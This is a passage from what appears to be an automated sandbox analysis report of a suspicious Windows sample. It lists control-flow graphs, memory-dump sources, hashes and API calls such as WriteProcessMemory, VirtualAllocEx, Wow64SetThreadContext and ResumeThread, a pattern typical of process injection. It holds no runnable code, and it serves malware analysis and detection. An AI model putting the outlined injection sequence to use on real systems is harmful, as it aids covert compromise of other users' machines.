                                                                                                      control_flow_graph 227 59627c0-59627e5 call 596211c 230 59627e7-59627f7 call 5961e78 227->230 231 59627fa-596288c CreateIconFromResourceEx 227->231 236 5962895-59628b2 231->236 237 596288e-5962894 231->237 237->236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: be430c8635334c4017aaa2fd2ee0643314a77074549ddeb12d5a6ba32f1e32a9
                                                                                                      • Instruction ID: aa98ffb0ee776d3cbc6e7a8e92ab2f2adcaf461adcad2a09bd49e76e1ef63159
                                                                                                      • Opcode Fuzzy Hash: be430c8635334c4017aaa2fd2ee0643314a77074549ddeb12d5a6ba32f1e32a9
                                                                                                      • Instruction Fuzzy Hash: C4319A769043499FCB11DFAAC844ADEBFF8EF49210F14805AE954A7261C339A854DFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 240 6d56748-6d5679e 242 6d567a0-6d567ac 240->242 243 6d567ae-6d567ed WriteProcessMemory 240->243 242->243 245 6d567f6-6d56826 243->245 246 6d567ef-6d567f5 243->246 246->245
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D567E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 7b0ba723ec4040b22520916501ac6f842b413e95c76c16390cdee03641b9d7fc
                                                                                                      • Instruction ID: 80e4e1b93486c1b4397875915314c9a61a5b55825ef127c1e17a55ad78388bde
                                                                                                      • Opcode Fuzzy Hash: 7b0ba723ec4040b22520916501ac6f842b413e95c76c16390cdee03641b9d7fc
                                                                                                      • Instruction Fuzzy Hash: 622124759003499FDF10DFAAC880BDEBBF5FF88310F10882AE918A7650C7799954CBA4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 250 6d56750-6d5679e 252 6d567a0-6d567ac 250->252 253 6d567ae-6d567ed WriteProcessMemory 250->253 252->253 255 6d567f6-6d56826 253->255 256 6d567ef-6d567f5 253->256 256->255
                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D567E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 18a019ce62d894aa0cdc5200f25c703302a1f34558f6e722d7adec91f1e180ab
                                                                                                      • Instruction ID: ca7e7ac5f3bf0d5eea5e3e187af08ebc446bf5c7d78507dc73100fd309b53778
                                                                                                      • Opcode Fuzzy Hash: 18a019ce62d894aa0cdc5200f25c703302a1f34558f6e722d7adec91f1e180ab
                                                                                                      • Instruction Fuzzy Hash: 952122759003499FDF10CFAAC880BEEBBF5BB88310F50842AE918A7650C7789954CBA4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 260 277cc40-277d634 DuplicateHandle 262 277d636-277d63c 260->262 263 277d63d-277d65a 260->263 262->263
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0277D566,?,?,?,?,?), ref: 0277D627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 2419feeb04a0b9ff9bf026098dee5a1b382fbbedc2548425ccf2d31a48c241c6
                                                                                                      • Instruction ID: 8d9b49778168fcd2066e970818f4559ccab4bde74122a3903606796aa379bbbc
                                                                                                      • Opcode Fuzzy Hash: 2419feeb04a0b9ff9bf026098dee5a1b382fbbedc2548425ccf2d31a48c241c6
                                                                                                      • Instruction Fuzzy Hash: BB21E5B59002499FDB10CFAAD584ADEBBF9FB48710F14841AE918A3350D375A950CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 276 6d56840-6d568cd ReadProcessMemory 279 6d568d6-6d56906 276->279 280 6d568cf-6d568d5 276->280 280->279
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D568C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 56b7e5e784713a36c5745e1b5e035b2c092fa25e98585d3030a58520f26c80ac
                                                                                                      • Instruction ID: 309db97fad03794832ead7e14fa0b62143ef97888cf2dee46d94a66478bbddfc
                                                                                                      • Opcode Fuzzy Hash: 56b7e5e784713a36c5745e1b5e035b2c092fa25e98585d3030a58520f26c80ac
                                                                                                      • Instruction Fuzzy Hash: 56211671C003499FDB10DFAAC880BEEBBF5FF48310F50842AE918A7250D7799944DBA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 266 6d565b8-6d56603 268 6d56605-6d56611 266->268 269 6d56613-6d56643 Wow64SetThreadContext 266->269 268->269 271 6d56645-6d5664b 269->271 272 6d5664c-6d5667c 269->272 271->272
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D56636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 10b5a9a664e6c1c7a2ff57190b38ff94423ab09582a9438b818625dd42db28e0
                                                                                                      • Instruction ID: 4aacaad4e87ba22d11375454907e0c7a2397ad69af506d450a310cac1bafb2a5
                                                                                                      • Opcode Fuzzy Hash: 10b5a9a664e6c1c7a2ff57190b38ff94423ab09582a9438b818625dd42db28e0
                                                                                                      • Instruction Fuzzy Hash: 17213571D003498FDB50DFAAC4857EEBBF4EF88620F54842ED819A7240CB78A945CFA4
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0277D566,?,?,?,?,?), ref: 0277D627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 547d05e95d7abacb5e91208bbfe12dc260aa3b7d057c701eaa2ac4d62b8f91e3
                                                                                                      • Instruction ID: 008111f3ccfb4eb37fc9a3e36d710d7a5a79c1b947daf1bf94bb700bff9a1307
                                                                                                      • Opcode Fuzzy Hash: 547d05e95d7abacb5e91208bbfe12dc260aa3b7d057c701eaa2ac4d62b8f91e3
                                                                                                      • Instruction Fuzzy Hash: 2C21E2B59002099FDB10CFAAD984ADEBBF4FB48720F14841AE918A3350D379A950CFA5
                                                                                                      APIs
                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D56636
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: e20c5264f64cc213286a8db8a1dee0b867137efc82fa7fa30f40416acfbba810
                                                                                                      • Instruction ID: fc9966823056420d6740a440f7434022f29beb77a7a7198bf2a248171f623960
                                                                                                      • Opcode Fuzzy Hash: e20c5264f64cc213286a8db8a1dee0b867137efc82fa7fa30f40416acfbba810
                                                                                                      • Instruction Fuzzy Hash: 72215271D003098FDB10DFAAC4817AEBBF5EB88320F54842ED919A7290CB789945CFA4
                                                                                                      APIs
                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D568C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 1726664587-0
                                                                                                      • Opcode ID: 4ff80014950c8f4fbdcf252071293312188e9ce754e45f166a7a5e9ee6a0f232
                                                                                                      • Instruction ID: 8897d00242b703a720503d75fba570951585afb79c5faf2a0836b2184096deeb
                                                                                                      • Opcode Fuzzy Hash: 4ff80014950c8f4fbdcf252071293312188e9ce754e45f166a7a5e9ee6a0f232
                                                                                                      • Instruction Fuzzy Hash: 01211471D003498FDB10DFAAC880BEEBBF5FF48310F50882AE919A7290D7799954DB65
                                                                                                      APIs
                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,059627DA,?,?,?,?,?), ref: 0596287F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromIconResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668623891-0
                                                                                                      • Opcode ID: 5ecbf37837bd6b31f7bfee87aecac84cb6532e25f9e7ed40fed6b8ee4a383e3c
                                                                                                      • Instruction ID: 36b41ff10cccdb513f478996c866429feffa6b3637fb43d1906cf1c0515cf4aa
                                                                                                      • Opcode Fuzzy Hash: 5ecbf37837bd6b31f7bfee87aecac84cb6532e25f9e7ed40fed6b8ee4a383e3c
                                                                                                      • Instruction Fuzzy Hash: 7B1126B580034D9FDB10DFAAC844BEEBFF8EB48720F14841AE914A7250C379A954DFA5
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D566FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 3ea11b1c0355a102909ea642158d2534579024c750e57eaaff2238287bc7cc92
                                                                                                      • Instruction ID: 0ad05731a571b1bf8a4a41169174f12b305739d30adb035afb6a8ad99cf18a8b
                                                                                                      • Opcode Fuzzy Hash: 3ea11b1c0355a102909ea642158d2534579024c750e57eaaff2238287bc7cc92
                                                                                                      • Instruction Fuzzy Hash: 0B115972C002498FDF10DFAAC8447EEBBF5EF88720F148419E919A7650C7759551CFA0
                                                                                                      APIs
                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D566FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 10c3f4c509d019d1f5f3071b7466aa740c58c62c9714c4f108848c574f075c25
                                                                                                      • Instruction ID: 4117f0c9a8388311054c936cf391794909ce76e1fefe6add3d5f462190c898c4
                                                                                                      • Opcode Fuzzy Hash: 10c3f4c509d019d1f5f3071b7466aa740c58c62c9714c4f108848c574f075c25
                                                                                                      • Instruction Fuzzy Hash: FA1137758003499FDF10DFAAC844BDEBBF5EF88720F14881AE915A7650C775A950CFA0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: d0c3b852b7583edacab7d598a7c3c19c39f34e47e628fd2623459c6f6a599daa
                                                                                                      • Instruction ID: 9212fdc15b9c02a2dded43b64a768d6946dbbea04730bdc274749345009e9fa4
                                                                                                      • Opcode Fuzzy Hash: d0c3b852b7583edacab7d598a7c3c19c39f34e47e628fd2623459c6f6a599daa
                                                                                                      • Instruction Fuzzy Hash: FB113A71D003498FDB10DFAAC4457AEFBF5EF88620F248419D519A7650CB75A944CF94
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0277B326
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 2009b0ed619f72c843029f3706b54f9d8a38247379cbdc2cc76142ae216aa577
                                                                                                      • Instruction ID: f5d944573d49df5101dddd367e5268672a174bdccddb4af0b2c517278e4f65a6
                                                                                                      • Opcode Fuzzy Hash: 2009b0ed619f72c843029f3706b54f9d8a38247379cbdc2cc76142ae216aa577
                                                                                                      • Instruction Fuzzy Hash: AF11DFB5C003498FDB10DF9AD444ADEFBF5EF88724F10842AD419A7610D379A545CFA5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0277B326
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545258609.0000000002770000.00000040.00000800.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2770000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 34117dc1e3e7a8c133ad24cd895cbd311d19a4fa3e61df3bfb378b659620e87f
                                                                                                      • Instruction ID: 1e488e6e93df7a0cb0e33fc0b9c644936755af9a30921ec1a15a6e95cde2e8da
                                                                                                      • Opcode Fuzzy Hash: 34117dc1e3e7a8c133ad24cd895cbd311d19a4fa3e61df3bfb378b659620e87f
                                                                                                      • Instruction Fuzzy Hash: 2E11DFB5C003498FDB10DF9AD444ADEFBF5EF88724F10842AD429A7610D379A545CFA1
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D591FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 0d6a6f076aa7e12fc5b6a40057e5cc1965a1cfd5cee66df71b4398a3b2ae2848
                                                                                                      • Instruction ID: 15d21017256dd67617841225bbb01bafb5927abb6a8c406014fda98f2d203539
                                                                                                      • Opcode Fuzzy Hash: 0d6a6f076aa7e12fc5b6a40057e5cc1965a1cfd5cee66df71b4398a3b2ae2848
                                                                                                      • Instruction Fuzzy Hash: EC11F5B5800349DFDB20DF9AD888BDEBBF8EB48710F108419E918A7640C375A954CFA5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: cc18a0084c4eec5c20795858f0b066457c86098c2534effc964578b075244e3a
                                                                                                      • Instruction ID: ffdbca30997bcf776697ec30274f05ad20bfec3136b00371554b4d1b18b0cb30
                                                                                                      • Opcode Fuzzy Hash: cc18a0084c4eec5c20795858f0b066457c86098c2534effc964578b075244e3a
                                                                                                      • Instruction Fuzzy Hash: 671163B1D003498FDB14DFAAC4403AEFBF5AB88720F24881EC519A7750CB79A944CF94
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D591FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550994572.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: b7534377ae6c6e66c9aa3fb7a38ab99339f5b677b163207fab626ade8b19ad5a
                                                                                                      • Instruction ID: 43e71fd8660ead477225b2a6f037b557706774ab9dc03ed2c41cea8ab84419a2
                                                                                                      • Opcode Fuzzy Hash: b7534377ae6c6e66c9aa3fb7a38ab99339f5b677b163207fab626ade8b19ad5a
                                                                                                      • Instruction Fuzzy Hash: 4A11F2B5800249DFDB20DF9AD885BDEBBF8EB48720F10841AE918A7640D375A954CFA1
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: 48610070c017a2dd8d74125df2d275d20f7c9e4e05d7f53b351c50726492e20a
                                                                                                      • Instruction ID: 644bbffaefb4ce96cf32f42900fcc2f826b521e1ec2f7f6deb23cd795d944a2e
                                                                                                      • Opcode Fuzzy Hash: 48610070c017a2dd8d74125df2d275d20f7c9e4e05d7f53b351c50726492e20a
                                                                                                      • Instruction Fuzzy Hash: DB2175B1800209DFDB10CF9AC885BAEBBF4FF88314F24841AE514A7340C779A944CFA0
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: 9853aea643325b69907293ada0d66562a63f6fbb4bc6bf9d869087754561d991
                                                                                                      • Instruction ID: bab1b9d1b5bb04b444c3c0271016fb41084cdaefce5cd6f75adf55026cae0d1b
                                                                                                      • Opcode Fuzzy Hash: 9853aea643325b69907293ada0d66562a63f6fbb4bc6bf9d869087754561d991
                                                                                                      • Instruction Fuzzy Hash: 9721DF329203098FCB10EFA8D80479EBBF5FB89311F00852AD655A7340EB74A959CBA1
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,059677C9,?,?), ref: 05967970
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1550532930.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5960000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: f056f7999b5ac77dd76dc746374168301f9df9f8cc5ee79cd2960cf6e7225ac1
                                                                                                      • Instruction ID: 7c966083bb78a06f0ba66933e31140253dc1fdc94618f5720a58ca0a1887f3bf
                                                                                                      • Opcode Fuzzy Hash: f056f7999b5ac77dd76dc746374168301f9df9f8cc5ee79cd2960cf6e7225ac1
                                                                                                      • Instruction Fuzzy Hash: C91125B58003499FDB20DF9AC444BEEBBF4EB48324F10841AD558A7341D779A944CFA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8645888246c417922ddd539c274651fa58f3bd6007336eb574d1e7d9de11973e
                                                                                                      • Instruction ID: 02f3ec1cebe487b90b4822dd3c9890573e3a31cdcd4ad8d3fd7a120ffb7d1cd6
                                                                                                      • Opcode Fuzzy Hash: 8645888246c417922ddd539c274651fa58f3bd6007336eb574d1e7d9de11973e
                                                                                                      • Instruction Fuzzy Hash: A221F1B6604204DFDB04DF10D9C4B16BB76FF98328F24C169E84D0B256D336E856CAB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f113e50968e62000dddf3ee04bc8d0cf6f688ef88941d0ee37fd7591b818b94a
                                                                                                      • Instruction ID: 307e9f19ea043cedf9ba5a424d06a81a3370d873498ea735c691dbed7611f9a1
                                                                                                      • Opcode Fuzzy Hash: f113e50968e62000dddf3ee04bc8d0cf6f688ef88941d0ee37fd7591b818b94a
                                                                                                      • Instruction Fuzzy Hash: BA21FFB2604240DFDB05DF14D984B26BF76FF88728F24C669E8490A256D336D856CBB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545002466.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d8d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a939d78fff530326b79d32c56bd72e8e97e2b5f4d56b9ab5bc7eaf76f411650c
                                                                                                      • Instruction ID: 8609e334209b8af9cf4c059304ab28ab71ab18ea355bffdf11d009c5d0eae296
                                                                                                      • Opcode Fuzzy Hash: a939d78fff530326b79d32c56bd72e8e97e2b5f4d56b9ab5bc7eaf76f411650c
                                                                                                      • Instruction Fuzzy Hash: 0B21D075604304EFDB14EF14D984B26BB66FB84724F24C569E84A4B2C6C33AD847CB72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1545002466.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d8d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1e179d9291a47d6b5b13b452d476ab65dabd9241348db505da428f8496f593a5
                                                                                                      • Instruction ID: 74caf5aad6856ab3ca3d6106e398c0fca84b326c003c45a860c4d42785a9b141
                                                                                                      • Opcode Fuzzy Hash: 1e179d9291a47d6b5b13b452d476ab65dabd9241348db505da428f8496f593a5
                                                                                                      • Instruction Fuzzy Hash: 942183755093808FCB12DF24D590715BF72EB46314F28C5DAD8498B2E7C33A980ACB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction ID: 74e5060194d5b02e503a25f78eb7d4dbc353ab12c835529b62352f94a55e589f
                                                                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction Fuzzy Hash: 3911D376504240DFCB15CF14D5C4B16BF72FF94324F28C6A9D8490B656C33AE856CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction ID: b25efe773ab2d8865bbfa8159e7eb8ef7a24eabc465bae315a79c89376055ca6
                                                                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                      • Instruction Fuzzy Hash: 7B11E676504280CFCB15CF14D5C4B16BF72FF94324F28C6A9D8490B656C33AD856CBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1544962187.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_d7d000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fcdc80419062b1f0612be5cddbd52667e740d12e065dfefece0a0f2537548e26
